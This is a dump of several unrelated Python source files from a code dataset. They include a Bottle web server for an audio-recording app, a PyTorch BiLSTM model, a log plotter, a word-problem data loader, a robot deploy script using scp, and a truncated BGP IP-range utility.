gen_classlist()\n\n","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2951892","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/techrec/server.py\n# Compiled at: 2019-11-15 16:32:42\nimport os, sys\nfrom datetime import datetime\nimport logging\nfrom functools import partial\nimport unicodedata\nfrom bottle import Bottle, request, static_file, redirect, abort, response\nimport bottle\nlogger = logging.getLogger('server')\nbotlog = logging.getLogger('bottle')\nbotlog.setLevel(logging.INFO)\nbotlog.addHandler(logging.StreamHandler(sys.stdout))\nbottle._stderr = lambda x: botlog.info(x.strip())\nfrom .db import Rec, RecDB\nfrom .processqueue import get_process_queue\nfrom .forge import create_mp3\nfrom .config_manager import get_config\n\ndef date_read(s):\n return datetime.fromtimestamp(int(s))\n\n\ndef date_write(dt):\n return dt.strftime('%s')\n\n\ndef rec_sanitize(rec):\n d = rec.serialize()\n d['starttime'] = date_write(d['starttime'])\n d['endtime'] = date_write(d['endtime'])\n return d\n\n\nclass DateApp(Bottle):\n \"\"\"\n This application will expose some date-related functions; it is intended to\n be used when you need to know the server's time on the browser\n \"\"\"\n\n def __init__(self):\n Bottle.__init__(self)\n self.route('/help', callback=self.help)\n self.route('/date', callback=self.date)\n self.route('/custom', callback=self.custom)\n\n def date(self):\n n = datetime.now()\n return {'unix': n.strftime('%s'), \n 'isoformat': n.isoformat(), \n 'ctime': n.ctime()}\n\n def custom(self):\n n = datetime.now()\n if 'strftime' not in request.query:\n abort(400, 'Need argument \"strftime\"')\n response.content_type = 'text/plain'\n return n.strftime(request.query['strftime'])\n\n def help(self):\n response.content_type = 'text/plain'\n return '/date : get JSON dict containing multiple formats of now()\\n' + '/custom?strftime=FORMAT : get now().strftime(FORMAT)'\n\n\nclass RecAPI(Bottle):\n\n def __init__(self, app):\n Bottle.__init__(self)\n self._route()\n self._app = app\n self.db = RecDB(get_config()['DB_URI'])\n\n def _route(self):\n self.post('/create', callback=self.create)\n self.post('/delete', callback=self.delete)\n self.post('/update/', callback=self.update)\n self.post('/generate', callback=self.generate)\n self.get('/help', callback=self.help)\n self.get('/', callback=self.help)\n self.get('/get/search', callback=self.search)\n self.get('/get/ongoing', callback=self.get_ongoing)\n self.get('/get/archive', callback=self.get_archive)\n self.get('/jobs', callback=self.running_jobs)\n self.get('/jobs/', callback=self.check_job)\n\n def create(self):\n req = dict(request.POST.decode().allitems())\n ret = {}\n logger.debug('Create request %s ' % req)\n now = datetime.now()\n start = date_read(req['starttime']) if 'starttime' in req else now\n name = req['name'] if 'name' in req else ''\n end = date_read(req['endtime']) if 'endtime' in req else now\n rec = Rec(name=name, starttime=start, endtime=end)\n ret = self.db.add(rec)\n return self.rec_msg('Nuova registrazione creata! (id:%d)' % ret.id, rec=rec_sanitize(rec))\n\n def delete(self):\n req = dict(request.POST.decode().allitems())\n logging.info('Server: request delete %s ' % req)\n if 'id' not in req:\n return self.rec_err('No valid ID')\n else:\n if self.db.delete(req['id']):\n return self.rec_msg('DELETE OK')\n return self.rec_err('DELETE error: %s' % self.db.get_err())\n\n def update(self, recid):\n req = dict(request.POST.decode().allitems())\n newrec = {}\n now = datetime.now()\n if 'starttime' not in req:\n newrec['starttime'] = now\n else:\n newrec['starttime'] = date_read(req['starttime'])\n if 'endtime' not in req:\n newrec['endtime'] = now\n else:\n newrec['endtime'] = date_read(req['endtime'])\n if 'name' in req:\n newrec['name'] = req['name']\n try:\n logger.info('prima di update')\n result_rec = self.db.update(recid, newrec)\n logger.info('dopo update')\n except Exception as exc:\n return self.rec_err('Errore Aggiornamento', exception=exc)\n\n return self.rec_msg('Aggiornamento completato!', rec=rec_sanitize(result_rec))\n\n def generate(self):\n recid = dict(request.POST.decode().allitems())['id']\n rec = self.db._search(_id=recid)[0]\n if rec.filename is not None and os.path.exists(rec.filename):\n return {'status': 'ready', 'message': 'The file has already been generated at %s' % rec.filename, \n 'rec': rec}\n else:\n if get_config()['FORGE_MAX_DURATION'] > 0 and (rec.endtime - rec.starttime).total_seconds() > get_config()['FORGE_MAX_DURATION']:\n response.status = 400\n return {'status': 'error', 'message': 'The requested recording is too long' + ' (%d seconds)' % (rec.endtime - rec.starttime).total_seconds()}\n rec.filename = get_config()['AUDIO_OUTPUT_FORMAT'] % {'time': rec.starttime.strftime('%y%m%d_%H%M'), \n 'endtime': rec.endtime.strftime('%H%M'), \n 'startdt': rec.starttime.strftime('%y%m%d_%H%M'), \n 'enddt': rec.endtime.strftime('%y%m%d_%H%M'), \n 'name': ('').join(filter(lambda c: c.isalpha(), unicodedata.normalize('NFKD', rec.name).encode('ascii', 'ignore').decode('ascii')))}\n self.db.get_session(rec).commit()\n job_id = self._app.pq.submit(create_mp3, start=rec.starttime, end=rec.endtime, outfile=os.path.join(get_config()['AUDIO_OUTPUT'], rec.filename), options={'title': rec.name, \n 'license_uri': get_config()['TAG_LICENSE_URI'], \n 'extra_tags': get_config()['TAG_EXTRA']})\n logger.debug('SUBMITTED: %d' % job_id)\n return self.rec_msg('Aggiornamento completato!', job_id=job_id, result='/output/' + rec.filename, rec=rec_sanitize(rec))\n\n def check_job(self, job_id):\n try:\n job = self._app.pq.check_job(job_id)\n except ValueError:\n abort(400, 'job_id not valid')\n\n def ret(status):\n return {'job_status': status, 'job_id': job_id}\n\n if job is True:\n return ret('DONE')\n if job is False:\n abort(404, 'No such job has ever been spawned')\n else:\n if job.ready():\n try:\n res = job.get()\n return res\n except Exception as exc:\n r = ret('FAILED')\n r['exception'] = str(exc)\n import traceback\n tb = traceback.format_exc()\n logger.warning(tb)\n if get_config()['DEBUG']:\n r['exception'] = '%s: %s' % (str(exc), tb)\n r['traceback'] = tb\n return r\n\n return ret('WIP')\n\n def running_jobs(self):\n res = {}\n res['last_job_id'] = self._app.pq.last_job_id\n res['running'] = self._app.pq.jobs.keys()\n return res\n\n def search(self, args=None):\n req = dict()\n req.update(request.GET.allitems())\n logger.debug('Search request: %s' % req)\n values = self.db._search(**req)\n from pprint import pprint\n logger.debug('Returned Values %s' % pprint([ r.serialize() for r in values ]))\n ret = {}\n for rec in values:\n ret[rec.id] = rec_sanitize(rec)\n\n logging.info('Return: %s' % ret)\n return ret\n\n def get_ongoing(self):\n return {rec.id:rec_sanitize(rec) for rec in self.db.get_ongoing()}\n\n def get_archive(self):\n return {rec.id:rec_sanitize(rec) for rec in self.db.get_archive_recent()}\n\n def help(self):\n return '

help


/get, /get/, /get/

Get Info about rec identified by ID

/search, /search/, /search//

Search rec that match key/value (or get all)

/delete/

Delete rec identified by ID

/update

Not implemented.

'\n\n def rec_msg(self, msg, status=True, **kwargs):\n d = {'message': msg, 'status': status}\n d.update(kwargs)\n return d\n\n def rec_err(self, msg, **kwargs):\n return self.rec_msg(msg, status=False, **kwargs)\n\n\nclass RecServer:\n\n def __init__(self):\n self._app = Bottle()\n self._app.pq = get_process_queue()\n self._route()\n self.db = RecDB(get_config()['DB_URI'])\n\n def _route(self):\n self._app.route('/output/', callback=lambda filepath: static_file(filepath, root=get_config()['AUDIO_OUTPUT'], download=True))\n self._app.route('/static/', callback=lambda filepath: static_file(filepath, root=get_config()['STATIC_FILES']))\n self._app.route('/', callback=lambda : redirect('/new.html'))\n self._app.route('/new.html', callback=partial(static_file, 'new.html', root=get_config()['STATIC_PAGES']))\n self._app.route('/old.html', callback=partial(static_file, 'old.html', root=get_config()['STATIC_PAGES']))\n self._app.route('/archive.html', callback=partial(static_file, 'archive.html', root=get_config()['STATIC_PAGES']))\n\n\nclass DebugAPI(Bottle):\n \"\"\"\n This application is useful for testing the webserver itself\n \"\"\"\n\n def __init__(self):\n Bottle.__init__(self)\n self.route('/sleep/:milliseconds', callback=self.sleep)\n self.route('/cpusleep/:howmuch', callback=self.cpusleep)\n self.route('/big/:exponent', callback=self.big)\n\n def sleep(self, milliseconds):\n import time\n time.sleep(int(milliseconds) / 1000.0)\n return 'ok'\n\n def cpusleep(self, howmuch):\n out = ''\n for i in xrange(int(howmuch) * 1000):\n if i % 11234 == 0:\n out += 'a'\n\n return out\n\n def big(self, exponent):\n \"\"\"\n returns a 2**n -1 string\n \"\"\"\n for i in xrange(int(exponent)):\n yield str(i) * 2 ** i\n\n def help(self):\n response.content_type = 'text/plain'\n return '\\n /sleep/ : sleep, than say \"ok\"\\n /cpusleep/ : busysleep, than say \"ok\"\\n /big/ : returns a 2**n -1 byte content\\n '\n\n\nclass PasteLoggingServer(bottle.PasteServer):\n\n def run(self, handler):\n from paste import httpserver\n from paste.translogger import TransLogger\n handler = TransLogger(handler, **self.options['translogger_opts'])\n del self.options['translogger_opts']\n httpserver.serve(handler, host=self.host, port=str(self.port), **self.options)\n\n\nbottle.server_names['pastelog'] = PasteLoggingServer\n\ndef main_cmd(*args):\n \"\"\"meant to be called from argparse\"\"\"\n c = RecServer()\n c._app.mount('/date', DateApp())\n c._app.mount('/api', RecAPI(c._app))\n if get_config()['DEBUG']:\n c._app.mount('/debug', DebugAPI())\n server = get_config()['WSGI_SERVER']\n if server == 'pastelog':\n from paste.translogger import TransLogger\n get_config()['WSGI_SERVER_OPTIONS']['translogger_opts'] = get_config()['TRANSLOGGER_OPTS']\n c._app.run(server=server, host=get_config()['HOST'], port=get_config()['PORT'], debug=get_config()['DEBUG'], quiet=True, **get_config()['WSGI_SERVER_OPTIONS'])\n\n\nif __name__ == '__main__':\n from cli import common_pre\n common_pre()\n logger.warn('Usage of server.py is deprecated; use cli.py')\n main_cmd()","sub_path":"pycfiles/techrec-1.2.0-py2.7/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"354457227","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nclass BiLSTM(nn.Module):\n\n def __init__(self, config):\n super(BiLSTM, self).__init__()\n self.config = config\n\n self.lstm = nn.LSTM(input_size=config.d_embedding, hidden_size=config.d_hidden,\n num_layers=config.n_layers, dropout=config.dropout_prob,\n bidirectional=config.birnn, batch_first=True)\n\n # linear layer maps from hidden state space to label space\n self.hidden2label = nn.Linear(config.n_layers*config.n_directions*config.d_hidden, config.d_out)\n self.hidden = self.init_hidden()\n # self.dropout = nn.Dropout(p=config.dropout_prob)\n # self.log_softmax = nn.LogSoftmax()\n\n\n def init_hidden(self):\n # axes semantics are (num_layers, batch_size, hidden_dim)\n n_layers = self.config.n_layers * self.config.n_directions\n return (Variable(torch.zeros(n_layers, self.config.batch_size, self.config.d_hidden)),\n Variable(torch.zeros(n_layers, self.config.batch_size, self.config.d_hidden)))\n\n # embeds is Variable of size - (|B|, |S|, |D|)\n def forward(self, embeds):\n batch_size = embeds.data.size()[0]\n sequence_length = embeds.data.size()[1]\n lstm_out, self.hidden = self.lstm(embeds, self.hidden)\n # print(\"ht size: {}\".format(ht.size()))\n rel_space = self.hidden2label(self.hidden[0].transpose(0, 1).contiguous().view(batch_size, -1)) # size - (|B|, |K|)\n scores = F.log_softmax(rel_space)\n return scores\n","sub_path":"simple_qa_rnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176412122","text":"import os\nimport time\nfrom tqdm import tqdm\nfrom random import randint\n\nfor edge_num in range(3000, 3001, 10):\n with open(\"5in.txt\", \"w+\") as f:\n f.write(str(edge_num) + '\\n')\n start = randint(0, 50)\n for count in range(int(edge_num/5)):\n if count < 10:\n v = start * (count + 1)\n else:\n v = start * (randint(10, 20))\n for v_time in range(5):\n x = str(randint(0, 50))\n f.write(str(v) + ' ' + x + ' ' + str(randint(10000, 100000)) + '\\n')\n\n f.write(str(start) + '\\n')\n f.write(x + '\\n')\n\n # yxm = os.popen(\"python3 Dijkstra.py < 5in.txt\").read()\n # print(yxm)\n","sub_path":"lab/lab4/testGraph.py","file_name":"testGraph.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487607385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 15 11:44:25 2018\n\n@author: qxb-810\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport re\nfrom tqdm import tqdm\nfrom array import array\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nfilename_pattern='slurm-[0-9]*.out'\ncontent_pattern='TIMESTEP ([0-9]*) / STATE ([a-z]*) / EPSILON (-?\\d+\\.?\\d*e?-?\\d+?) / EPISODE ([0-9]*) / ACTION [0-9] / REWARD (-?[.0-9]*)'\n\nstep=array('i')\nepsilon=array('d')\nreward=array('d')\n\neval_episode=array('i')\neval_reward=array('d')\n\nprint('Scanning directory for log file...')\nfor f in os.listdir('.'):\n\tif re.match(filename_pattern,f):\n\t\tprint('Find:',f)\n\t\twith open(f) as file:\n\t\t\ttry:\n\t\t\t\tfor line in tqdm(file):\n\t\t\t\t\tif re.match(content_pattern,line):\n\t\t\t\t\t\tm=re.match(content_pattern,line)\n\t\t\t\t\t\tepisode=int(m.group(4))\n\t\t\t\t\t\tstate=m.group(2)\n\t\t\t\t\t\tr=float(m.group(5))\n\t\t\t\t\t\tif state=='explore' or state=='observe' or state=='train':\n\t\t\t\t\t\t\tif episode==len(step):\n\t\t\t\t\t\t\t\tstep.append(int(m.group(1)))\n\t\t\t\t\t\t\t\tepsilon.append(float(m.group(3)))\n\t\t\t\t\t\t\t\treward.append(0 if r<0 else r)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\treward[episode]+=(0 if r<0 else r)\n\t\t\t\t\t\telif state=='evaluate':\n\t\t\t\t\t\t\tif len(eval_episode)==0 or eval_episode[-1]!=episode:\n\t\t\t\t\t\t\t\teval_episode.append(episode)\n\t\t\t\t\t\t\t\teval_reward.append(0 if r<0 else r)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\teval_reward[-1]+=(0 if r<0 else r)\n\t\t\t\t\t\t\t\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tprint('Interrupted, ignoring the following data...')\n\t\t\t\tpass\n\t\t\tfinally:\n\t\t\t\twith open(\"episode-reward-%i.txt\"%episode,'w') as result_file:\n\t\t\t\t\tfor e in zip(eval_episode,np.array(eval_reward)/10):\n\t\t\t\t\t\tprint('Episode: %i, Average reward: %d'%e,file=result_file)\n\t\t\t\tplt.figure(1)\n\t\t\t\tx=range(len(step))\n\t\t\t\tplt.plot(x,step)\n\t\t\t\tplt.savefig(\"episode-step-%i.jpg\"%episode)\n\t\t\t\tplt.figure(2)\n\t\t\t\tx=range(len(epsilon))\n\t\t\t\tplt.plot(x,epsilon)\n\t\t\t\tplt.savefig(\"episode-epsilon-%i.jpg\"%episode)\n\t\t\t\tplt.figure(3)\n\t\t\t\tx=range(len(reward))\n\t\t\t\tplt.scatter(x,reward,marker='.')\n\t\t\t\tplt.savefig(\"episode-reward-%i.jpg\"%episode)\n\t\t\t\tplt.figure(4)\n\t\t\t\tplt.plot(eval_episode,np.array(eval_reward)/10)\n\t\t\t\tplt.savefig(\"episode-reward-eval-%i.jpg\"%episode)\n\t\t","sub_path":"DRL-Breakout/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15497540","text":"import load\nimport numpy as np\nfrom expression import get_chosen_word_problems\nfrom typing import List, TYPE_CHECKING, Set, Dict\n\nif TYPE_CHECKING:\n from loader import Loader\n\n\ndef prepare_data(loader: 'Loader', chosen: List = None, directory: str = './dataset/WP500/traindata',\n count=None) -> 'Data':\n \"\"\"\n Prepares single data for genetic algorithm or solver.\n :param count: Specifies count of word problems in directory.\n :param loader: Instance of class Loader.\n :param chosen: Specification of chosen expressions.\n :param directory: Path to saved word problems.\n :return: Instance of class Data.\n \"\"\"\n data = Data(directory=directory, loader=loader, chosen=chosen, count=count)\n data.create_expression_labels()\n data.get_result_labels()\n data.set_init_dictionary()\n data.set_possible_expressions_wps(set(data.expressions))\n return data\n\n\ndef create_buckets_new(expressions):\n \"\"\"\n Creates dictionary where KEY is an expression and VALUE is a list of indexes.\n :param expressions: List of string expressions. ['NUM1 + NUM2', 'NUM1 - NUM2', 'NUM1 + NUM2', ...]\n :return: Dictionary described above. {'NUM1 + NUM2': [0, 2, ....], 'NUM1 - NUM2': [1, ...]}\n \"\"\"\n buckets = dict()\n for i, expression in enumerate(expressions, start=0):\n if expression in buckets:\n buckets[expression].append(i)\n else:\n buckets[expression] = [i]\n return buckets\n\n\ndef create_expression_labels(expressions):\n \"\"\"\n Creates sorted dictionary where KEY is an expression and VALUE is an unique number from 0 to N - 1 where N is number of unique expressions.\n :param expressions: List of string expressions. ['NUM1 + NUM2', 'NUM1 - NUM2', 'NUM1 + NUM2', ...]\n :return: {'NUM1 + NUM2': 0, 'NUM1 - NUM2': 1, ...}\n \"\"\"\n unique = list(set(expressions))\n unique.sort()\n expression_labels = {val: i for i, val in enumerate(unique, start=0)}\n return expression_labels\n\n\nclass Data:\n expression_labels = None\n labels = None\n\n def __init__(self, directory: str, loader: 'Loader', chosen: List[str] = None, count: int = None) -> None:\n \"\"\"\n Constructor for class Data. Data class wraps all important information about train or test data.\n :param count: Specifying the number of files for word problems.\n :param directory: Parameter specifying path to files.\n :param loader: Instance of class Loader.\n :param chosen: List of chosen word problems. Example: ['NUM1 + NUM2', 'NUM1 - NUM2', ...]\n \"\"\"\n self.directory = directory\n if chosen is None:\n self.word_problems, self.results, self.expressions = get_chosen_word_problems(loader, directory,\n count=count)\n else:\n self.word_problems, self.results, self.expressions = get_chosen_word_problems(loader, directory, chosen,\n count=count)\n self.buckets = create_buckets_new(self.expressions)\n\n def create_expression_labels(self):\n \"\"\"\n Creates sorted dictionary where KEY is an expression and VALUE is an unique number from 0 to N - 1 where N is number of unique expressions.\n \"\"\"\n self.expression_labels = create_expression_labels(self.expressions)\n\n def set_expression_labels(self, labels: Dict):\n \"\"\"\n Sets expressions labels.\n :param labels: Dictionary of labels, where KEY is an expression and VALUE is an unique number from 0 to N - 1 where N is number of unique expressions.\n \"\"\"\n self.expression_labels = labels\n\n def set_init_dictionary(self):\n \"\"\"\n Sets init dictionary to every word problem in self.word_problems.\n \"\"\"\n init = {e: 0 for e in self.expression_labels}\n for word_problem in self.word_problems:\n word_problem.init_dictionary = init\n\n def get_result_labels(self):\n \"\"\"\n Converts expressions to number identifier for SVM.\n \"\"\"\n assert self.expression_labels is not None\n self.labels = [self.expression_labels[expression] for expression in self.expressions]\n\n def set_possible_expressions_wps(self, expressions: Set):\n \"\"\"\n Tries all expressions from train expressions. Creates sets of possible expressions (result is higher or equal to 0)\n :param expressions: Expression set from train data.\n \"\"\"\n for word_problem in self.word_problems:\n word_problem.set_possible_expressions(expressions)\n\n\nclass SolveDataSVM:\n def __init__(self, dataset, loader, train_dir_init='/traindata', test_dir_init='/testdata', chosen_test=None,\n chosen_both=None):\n \"\"\"\n Handles creating two wrappers for train and test data. Applies given logic.\n Dataset can be WP150 or WP500.\n\n :param dataset: WP150 or WP500\n :param loader: Instance of class Loader.\n :param chosen_test: Specifies if we want to run testing on some special expressions. Important condition is that expressions must be in train Data.\n :param chosen_both: If chosen_bot is specified it creates two wrappers with different word problems but same expressions.\n \"\"\"\n assert dataset == 'WP150' or dataset == 'WP500'\n train_path = './dataset/' + dataset + train_dir_init\n test_path = './dataset/' + dataset + test_dir_init\n if chosen_both is not None:\n self.train_data = Data(train_path, loader, chosen_both)\n self.test_data = Data(test_path, loader, chosen_both)\n else:\n self.train_data = Data(train_path, loader)\n if chosen_test is None:\n # set chosen to set of expressions from self.train_data\n self.test_data = Data(test_path, loader, chosen=list(set(list(self.train_data.expressions))))\n else:\n # check if set chosen_test - set of expressions from self.train_data is empty set,\n assert set(chosen_test) - set(self.train_data.expressions) == set()\n self.test_data = Data(test_path, loader, chosen=chosen_test)\n self.train_data.create_expression_labels()\n self.test_data.set_expression_labels(self.train_data.expression_labels)\n\n self.train_data.set_init_dictionary()\n self.test_data.set_init_dictionary()\n\n self.train_data.get_result_labels()\n self.test_data.get_result_labels()\n\n self.train_data.set_possible_expressions_wps(set(self.train_data.expressions))\n self.test_data.set_possible_expressions_wps(set(self.train_data.expressions))\n\n\nclass SolveDataSA:\n def __init__(self, directory: str, chosen: List = None):\n \"\"\"\n Prepares data for Syntax Analysis (first solution in Bachelor thesis).\n :param directory: Directory of word problems.\n :param chosen: List of chosen expressions solving word problems.\n \"\"\"\n sentences, results, data, expressions = load.get_files_for_sa(directory)\n if chosen is None:\n self.sentences, self.results, self.data, self.expressions = sentences, results, data, expressions\n else:\n mask = expressions == chosen[0]\n for c in chosen[1:]:\n mask = np.logical_or(mask, expressions == c)\n self.sentences, self.results, self.data, self.expressions = sentences[mask], results[mask], data[mask], expressions[mask]\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264408249","text":"import os, sys\r\nimport subprocess \r\nimport time\r\n\r\n#Possible paths for SSH and SCP - assume we're using the ones from the GIT install,\r\n# but don't assume people put them on their paths. Chris Gerth forces the C/B/D drive\r\n# checking because he builds giant computers and installs things wherever he likes.\r\nSSH_PATH_LIST = [\"C:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n\t\t\t\t \"C:\\\\Program Files (x86)\\\\Git\\\\bin\\\\ssh.exe\",\r\n \"ssh\"]\r\n \r\n \r\n \r\n \r\nSCP_PATH_LIST = [\"C:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n\t\t\t\t \"C:\\\\Program Files (x86)\\\\Git\\\\bin\\\\scp.exe\",\r\n \"scp\"]\r\n \r\n#Beaglebone Black should be at a fixed IP address\r\nTARGET_IP_ADDRESS = \"10.17.36.9\"\r\n \r\n#Path to root directory where we put the files on the remote\r\nTARGET_SCRIPT_DIR = \"~/CasseroleVision/\"\r\nTARGET_SERVICE_DIR = \"/lib/systemd/system/\"\r\nTARGET_SERVICE_DIR_TOM = \"/home/root/CasseroleVision/\"\r\n\r\n\r\n#Utility to determine if path is an executable \r\ndef isExecutable(fpath):\r\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\r\n \r\n#Runs command with error checking and prints info\r\ndef runCmd(cmd, ignore_error=False, cmd_stdin = None):\r\n errors_present = False\r\n retstr = \"\"\r\n print(\"\\n\\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\r\n print(\"Running command:\\n\" + cmd)\r\n\r\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,stdin=subprocess.PIPE)\r\n if(cmd_stdin != None):\r\n proc.stdin.write(cmd_stdin.encode())\r\n retstr = proc.communicate()[0]\r\n retstr = retstr.decode('utf-8')\r\n\r\n if((errors_present or proc.returncode != 0) and ignore_error == False):\r\n print(\"Error while running command:\\n\" + retstr)\r\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\\n\\n\")\r\n sys.exit(-1)\r\n \r\n print(\"Command returned:\\n\" + retstr)\r\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\\n\\n\")\r\n return retstr\r\n \r\n \r\n##################################################################\r\n### Main code begins here\r\n##################################################################\r\n\r\n#Find where SSH and SCP are at on the user's PC\r\nssh_exe = None\r\nscp_exe = None\r\nfor path in SSH_PATH_LIST:\r\n if(isExecutable(path)):\r\n ssh_exe = \"\\\"\" + path + \"\\\"\" \r\n break\r\n \r\nif(ssh_exe == None):\r\n print(\"ERROR: cannot find SSH utility on this PC.... is Git installed?\")\r\n sys.exit(-1)\r\n \r\n \r\nfor path in SCP_PATH_LIST:\r\n if(isExecutable(path)):\r\n scp_exe = \"\\\"\" + path + \"\\\"\" \r\n break\r\n \r\nif(scp_exe == None):\r\n print(\"ERROR: cannot find SSH utility on this PC.... is Git installed?\")\r\n sys.exit(-1)\r\n\r\n#Copy python scripts\r\ncmd = scp_exe + \" ../*.py\" + \" root@\" + TARGET_IP_ADDRESS + \":\"+ TARGET_SCRIPT_DIR \r\nprint(\"Copying python scripts...\")\r\nrunCmd(cmd, False, \"\\n\")\r\n\r\n\r\nsys.exit(0)\r\n\r\n \r\n","sub_path":"RobotCasserole2017-master/BBB/deploy/justCopyCode.py","file_name":"justCopyCode.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"124667158","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import KFold\n\nfrom utils import print_step\n\n\ndef run_cv_model(train, test, target, model_fn, params, eval_fn, label):\n kf = KFold(n_splits=5, shuffle=True, random_state=2017)\n fold_splits = kf.split(train)\n cv_scores = []\n pred_full_test = 0\n pred_train = np.zeros(train.shape[0])\n i = 1\n for dev_index, val_index in fold_splits:\n print_step('Started ' + label + ' fold ' + str(i) + '/5')\n if isinstance(train, pd.DataFrame):\n dev_X, val_X = train.values[dev_index], train.values[val_index]\n dev_y, val_y = target[dev_index], target[val_index]\n dev_X = pd.DataFrame(dev_X, columns=train.columns)\n val_X = pd.DataFrame(val_X, columns=train.columns)\n for (column, dtype) in list(zip(train.columns, list(train.dtypes))):\n dev_X[column] = dev_X[column].astype(dtype)\n val_X[column] = val_X[column].astype(dtype)\n else:\n dev_X, val_X = train[dev_index], train[val_index]\n dev_y, val_y = target[dev_index], target[val_index]\n\n params2 = params.copy()\n pred_val_y, pred_test_y = model_fn(dev_X, dev_y, val_X, val_y, test, params2)\n pred_full_test = pred_full_test + pred_test_y\n pred_train[val_index] = pred_val_y\n cv_score = eval_fn(val_y, pred_val_y)\n cv_scores.append(eval_fn(val_y, pred_val_y))\n print_step(label + ' cv score ' + str(i) + ' : ' + str(cv_score))\n i += 1\n print_step(label + ' cv scores : ' + str(cv_scores))\n print_step(label + ' mean cv score : ' + str(np.mean(cv_scores)))\n print_step(label + ' std cv score : ' + str(np.std(cv_scores)))\n pred_full_test = pred_full_test / 5.0\n results = {'label': label,\n 'train': pred_train, 'test': pred_full_test,\n 'cv': cv_scores}\n return results\n","sub_path":"cv.py","file_name":"cv.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"272373791","text":"#!/usr/bin/env python3\nfrom _pybgpstream import BGPStream, BGPRecord, BGPElem\nimport sqlite3\nimport iptools\n\ndef calculate_min_max(ip):\n ip_range = iptools.IpRange(ip)\n return inflate_ip(ip_range[0]), inflate_ip(ip_range[-1])\n\ndef inflate_ip(ip):\n if iptools.ipv4.validate_ip(ip):\n return inflate_ipv4(ip)\n return inflate_ipv6(ip)\n\ndef inflate_ipv4(ip):\n ip = ip.split(\".\")\n ip = \".\".join([str(i).zfill(3) for i in ip])\n return ip\n\ndef inflate_ipv6(ip):\n ip = 